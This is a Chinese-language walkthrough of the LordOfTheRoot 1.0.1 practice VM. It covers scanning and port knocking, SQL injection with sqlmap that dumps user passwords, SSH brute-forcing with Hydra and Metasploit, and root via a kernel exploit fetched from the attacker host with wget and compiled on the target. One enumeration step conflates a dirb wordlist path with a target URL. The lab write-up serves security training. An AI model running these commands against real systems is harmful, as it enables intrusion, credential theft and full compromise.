LordOfTheRoot 1.0.1 渗透测试教学文档

1. 环境准备

• 攻击机: Kali Linux
• 目标机: LordOfTheRoot 1.0.1 (IP: 192.168.111.138)
• 工具: VMware, nmap, knock/hping3, dirb, sqlmap, hydra, Metasploit, gcc

2. 信息收集

2.1 网络扫描

使用nmap进行主机发现和端口扫描：

nmap -sP 192.168.111.0/24  # 发现目标IP
nmap -sS -sV -A -p- -T5 192.168.111.138  # 详细扫描

初始扫描结果仅显示22端口(SSH服务)开放。

3. 端口碰撞(Port Knocking)

目标提示"Easy as 1,2,3"，暗示需要进行端口碰撞。

3.1 端口碰撞方法

方法一：使用knock工具

sudo apt install knockd
knock <IP> 1 2 3 -v

方法二：使用hping3

hping3 -S 192.168.111.138 -p 1 -c 1
hping3 -S 192.168.111.138 -p 2 -c 1
hping3 -S 192.168.111.138 -p 3 -c 1

参数说明：

• -S: 发送SYN包(TCP连接握手信号)
• -p: 目标端口
• -c: 发送次数

3.2 验证碰撞结果

再次扫描确认新开放的端口：

nmap -sS -sV -A -p- -T5 192.168.111.138

发现1337端口(HTTP服务)已开放。

4. Web渗透

4.1 目录枚举

访问发现的路径：

http://192.168.111.138:1337/usr/share/dirb/wordlists/common.txt

在页面源代码中发现Base64编码信息：

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

4.2 Base64解码

echo 'THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh' | base64 -d

得到：

Lzk3ODM0NTIxMC9pbmRleC5waHA= , Closer!

继续解码：

echo 'Lzk3ODM0NTIxMC9pbmRleC5waHA=' | base64 -d

得到路径：

/978345210/index.php

4.3 SQL注入

访问发现的页面：

http://192.168.111.138:1337//978345210/index.php

使用sqlmap进行注入：

爆破数据库名：

sqlmap -u http://192.168.111.138:1337//978345210/index.php --forms --dbs -o

发现数据库：

• information_schema
• mysql
• performance_schema
• Webapp

爆破表名：

sqlmap -u http://192.168.111.138:1337//978345210/index.php --forms -D Webapp --tables

发现Users表。

爆破字段：

sqlmap -u http://192.168.111.138:1337//978345210/index.php --forms -D Webapp -T Users --columns

发现字段：id, username, password。

爆破数据：

sqlmap -o -u "http://192.168.111.138:1337/978345210/index.php" --forms -D Webapp -T Users -C id,username,password --dump

获得凭证：

用户: frodo, smeagol, aragorn, legolas, gimli
密码: iwilltakethering, MyPreciousR00t, AndMySword, AndMyBow, AndMyAxe

5. SSH爆破

5.1 使用Hydra爆破

hydra -L user.txt -P pass.txt 192.168.111.138 ssh

成功凭证：

smeagol:MyPreciousR00t

5.2 使用Metasploit爆破

msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhost 192.168.111.138
set user_file /root/Desktop/lordof/user.txt
set pass_file /root/Desktop/lordof/pass.txt
set stop_on_success true
run

6. 提权

6.1 登录SSH

ssh smeagol@192.168.111.138
密码: MyPreciousR00t

检查系统信息：

id
lsb_release -a  # Ubuntu 14.04.3 LTS

6.2 内核提权

查找漏洞：

搜索Ubuntu 14.04 exploit，发现EDB-ID:39166。

获取并编译EXP：

searchsploit 39166
locate linux/local/39166.c
cp /usr/share/exploitdb/exploits/linux/local/39166.c .

传输EXP到目标：

在Kali开启HTTP服务：

python -m SimpleHTTPServer 8081

在目标机下载：

wget http://192.168.111.128:8081/39166.c
gcc 39166.c -o yg
chmod +x yg
./yg

成功获得root权限。

查看flag：

"There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power." - Gandalf

6.3 备选提权方法：MySQL UDF提权

（文档中未详细展开，可作为扩展研究）

7. 总结

本次渗透测试流程：

1. 信息收集发现SSH服务
2. 通过端口碰撞打开HTTP服务
3. Web目录枚举发现隐藏路径
4. Base64解码发现真实路径
5. SQL注入获取数据库凭证
6. SSH爆破获得系统访问权
7. 内核漏洞利用实现提权

关键点：

• 端口碰撞技术的理解和应用
• Web信息收集和编码分析
• SQL注入自动化工具使用
• 凭证爆破技巧
• 内核漏洞利用方法